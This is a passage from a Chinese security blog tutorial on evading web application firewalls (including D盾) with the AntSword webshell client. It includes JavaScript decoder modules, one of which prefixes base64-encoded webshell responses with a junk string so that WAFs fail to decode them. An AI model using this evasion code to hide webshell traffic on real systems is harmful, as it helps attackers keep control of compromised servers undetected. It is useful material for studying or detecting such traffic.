<p>顺利byapass D盾</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2018%2014%2055.png" alt="20200521181455"></p>
<p>抓包查看发送的数据可看到所有的参数值都已经过编码器的编码，这样就能有效防止waf的base64解码了。</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2018%2025%2027.png" alt="20200521182527"></p>
<p><a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AwesomeEncoder/tree/master/php/encoder">这个项目</a>中有一些写好的编码器，大家可以拿来用，另外你也可以按照自己的思路去写一个编码器，这样bypass效果会更好。</p>
<p><strong>yzddmr6大佬已经通过修改蚁剑源码实现了上述功，项目地址是：<a target="_blank" rel="noopener" href="https://github.com/yzddmr6/antSword">https://github.com/yzddmr6/antSword</a></strong></p>
<h2 id="使用解码器"><a href="#使用解码器" class="headerlink" title="使用解码器"></a>使用解码器</h2><p>蚁剑的编码器是编码或者加密蚁剑向服务端发送的请求包的，所以解码器是用来编码或者加密服务端返回给蚁剑的数据包的，编码后的数据包只有蚁剑能够解码。经测试，使用编码器其实就能够bypass D盾了，但是不排除有些waf会检测返回包，所以有时也需要使用解码器。蚁剑自带了两种解码器，base64和rot13，下面还是通过抓包的方式来对比不使用解码器和使用了解码器后返回包的不同。</p>
<p>不使用解码器：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2022%2010%2012%2013.png" alt="20200522101213"></p>
<p>可看到返回包中的数据均已明文显示。</p>
<p>使用base64解码器：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2022%2010%2014%2001.png" alt="20200522101401"></p>
<p>现在的返回包中的数据都已使用base64进行编码了。</p>
<blockquote>
<p>很多新手朋友在使用蚁剑时都会认为编码器和解码器是成对存在的，使用了base64编码器就必须使用base64解码器，其实不是这样的，编码器和解码器除了名字有点类似，在使用时毫无关系（RAS和AES加密方式的编码器和解码器除外）。</p>
</blockquote>
<p>分析下蚁剑解码器的写法：</p>
<pre class="line-numbers language-js" data-language="js"><code class="language-js"><span class="token comment">/**
 * php::base64解码器
 * Create at: 2020/05/22 10:21:48
 */</span>

<span class="token string">'use strict'</span><span class="token punctuation">;</span>

module<span class="token punctuation">.</span>exports <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
  <span class="token comment">/**
   * @returns &#123;string&#125; asenc 将返回数据base64编码
   * 自定义输出函数名称必须为 asenc
   * 该函数使用的语法需要和shell保持一致
   */</span>
  <span class="token function-variable function">asoutput</span><span class="token operator">:</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">return</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">function asenc($out)&#123;
      return @base64_encode($out);
    &#125;
    </span><span class="token template-punctuation string">`</span></span><span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">\n\s+</span><span class="token regex-delimiter">/</span><span class="token regex-flags">g</span></span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
  <span class="token comment">/**
   * 解码 Buffer
   * @param &#123;string&#125; data 要被解码的 Buffer
   * @returns &#123;string&#125; 解码后的 Buffer
   */</span>
  <span class="token function-variable function">decode_buff</span><span class="token operator">:</span> <span class="token punctuation">(</span><span class="token parameter">data<span class="token punctuation">,</span> ext<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span></span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">return</span> Buffer<span class="token punctuation">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>先看下解码器的组成，这里导出了两个方法，<code>asoutput</code>及<code>decode_buff</code>。<code>asoutput</code>无需传入参数，返回一段php代码字符串，名称为<code>asenc</code>的函数，这个函数会放在请求包里，用于在服务端执行完代码后，再回显部分调用该函数asenc来编码处理，所以服务端无需针对解码做改动。</p>
<p>按照这个方式自写一个解码器：</p>
<pre class="line-numbers language-js" data-language="js"><code class="language-js"><span class="token comment">/**
 * php::base64自定义解码器
 * Create at: 2020/05/22 10:21:48
 */</span>

<span class="token string">'use strict'</span><span class="token punctuation">;</span>

module<span class="token punctuation">.</span>exports <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
  <span class="token comment">/**
   * @returns &#123;string&#125; asenc 将返回数据base64编码
   * 自定义输出函数名称必须为 asenc
   * 该函数使用的语法需要和shell保持一致
   */</span>
  <span class="token function-variable function">asoutput</span><span class="token operator">:</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">return</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">function asenc($out)&#123;
      //返回时添加一个随机字符串，避免被waf解码成功
      return 'wg4a2'.@base64_encode($out);
    &#125;
    </span><span class="token template-punctuation string">`</span></span><span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">\n\s+</span><span class="token regex-delimiter">/</span><span class="token regex-flags">g</span></span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
  <span class="token comment">/**
   * 解码 Buffer
   * @param &#123;string&#125; data 要被解码的 Buffer
   * @returns &#123;string&#125; 解码后的 Buffer
   */</span>
  <span class="token function-variable function">decode_buff</span><span class="token operator">:</span> <span class="token punctuation">(</span><span class="token parameter">data<span class="token punctuation">,</span> ext<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span></span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">let</span> res <span class="token operator">=</span> Buffer<span class="token punctuation">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">wg4a2</span><span class="token regex-delimiter">/</span><span class="token regex-flags">g</span></span><span class="token punctuation">,</span><span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> res<span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使用这个解码器时就会子啊返回的数据包中添加随机字符串，如下图，这样只有蚁剑客户端能够解码成功，而waf则不可以。</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2022%2011%2031%2043.png" alt="20200522113143"></p>
<p>编写解码器的思路大概就是这样的，大家可以以各种骚思路去写自己的解码器。</p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>除了使用常规的编码，乱序操作去写编码器和解码器，还可以使用对称加密，非对称加密等算法写编码器和解码器来逃避waf的流量检测，这种做法其实和冰蝎就很类似了。这种思路对应的文章请看这两篇：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6571">蚁剑实现动态秘钥编码器解码器</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5756">关于对antSword(蚁剑)进行流量混淆处理的解决方案</a></li>
</ul>
<p><strong>刚开始研究蚁剑的编码器和解码器，文中有写的不对或者不好的地方还望各位师傅斧正</strong></p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7735">蚁剑改造过WAF系列（一）</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5756">关于对antSword(蚁剑)进行流量混淆处理的解决方案</a></li>
<li><a target="_blank" rel="noopener" href="http://www.hackdig.com/03/hack-72681.htm">蚁剑改造计划之实现其他参数的随机化</a></li>
<li><a target="_blank" rel="noopener" href="http://www.test666.me/archives/289/">[红队武器] - AntSword之特征修改与流量处理</a></li>
<li><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/EHDvRA3Lpykpu0BDS17ENQ">AntSword编码器篇(一) HelloWorld​</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6571">蚁剑实现动态秘钥编码器解码器</a></li>
<li><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/ai3dW8H_ZnlFMPo-pgoqZw">WAF拦了蚁剑发送的其它参数时怎么操作</a></li>
<li><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247483991&idx=1&sn=7f5e52e8d8b7a00f7d2889d8a628ef10&chksm=e91c59afde6bd0b99bf22c5ef675828bc3202f2be23eea9e9519d4259af83a15f813c946bd47&mpshare=1&scene=23&srcid=0519DoTZK79rt9hiksYzCv47&sharer_sharetime=1589856866463&sharer_shareid=f5d04c386d841caa7b6a34a6658938ee%23rd">AntSword编码器篇(二)</a></li>
</ul>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">darkless</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://darkless.cn/2020/05/19/antsword-bypass-waf/">https://darkless.cn/2020/05/19/antsword-bypass-waf/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">darkless</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/AntSword/">
                                    <span class="chip bg-color">AntSword</span>
                                </a>
                            
                                <a href="/tags/%E8%9A%81%E5%89%91/">
                                    <span class="chip bg-color">蚁剑</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="qq,qzone,wechat,weibo" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '4u9UM1IWQmMfo0svsgBdeILp-gzGzoHsz',
        appKey: 'cEUGC0oJ83lMp2x7xeHBvM41',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '本站带邮件回复功能 填写邮箱后 可以收到评论回复提醒'
    });
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/06/07/thinkphp3.2.3-sqli/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/handbye/images/picgo5d5f7b95ceaea939.jpg" class="responsive-img" alt="thinkphp3.2.3 sql注入分析">
                        
                        <span class="card-title">thinkphp3.2.3 sql注入分析</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-06-07
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                    web安全
                                </a>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="post-category">
                                    漏洞复现
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SQL%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">SQL注入</span>
                    </a>
                    
                    <a href="/tags/thinkphp/">
                        <span class="chip bg-color">thinkphp</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/05/12/discuzx3.3-authkey-blasting/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/1.jpg" class="responsive-img" alt="DiscuzX3.3 authkey可爆破漏洞复现">
                        
                        <span class="card-title">DiscuzX3.3 authkey可爆破漏洞复现</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-12
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                    web安全
                                </a>
                            
                            <a href="/categories/web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="post-category">
                                    漏洞复现
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Discuz/">
                        <span class="chip bg-color">Discuz</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('3'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2016-2021</span>
            
            <span id="year">2016</span>
            <a href="/about" target="_blank">darkless</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">104k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2016";
                    var startMonth = "6";
                    var startDate = "28";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="https://darkless.cn" target="_blank">晋ICP备16004292号</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/handbye" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:hand01@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
